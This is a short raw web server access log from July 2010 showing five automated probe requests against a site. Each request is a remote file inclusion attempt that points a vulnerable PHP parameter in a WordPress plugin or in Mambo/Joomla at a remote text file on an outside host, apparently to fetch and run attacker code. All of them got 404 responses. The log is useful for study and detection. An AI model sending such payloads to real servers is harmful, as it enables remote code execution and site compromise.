211.210.38.8 - - [08/Jul/2010:12:16:06 -0700] "GET /logs/access_100703.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "virtualsupplynet.com"
67.59.156.163 - - [08/Jul/2010:13:09:24 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.59.156.163 - - [08/Jul/2010:13:09:24 -0700] "GET /index.php?mosConfig.absolute.path=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.240.26.129 - - [08/Jul/2010:13:13:10 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
210.240.26.129 - - [08/Jul/2010:13:13:10 -0700] "GET /index.php?mosConfig.absolute.path=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
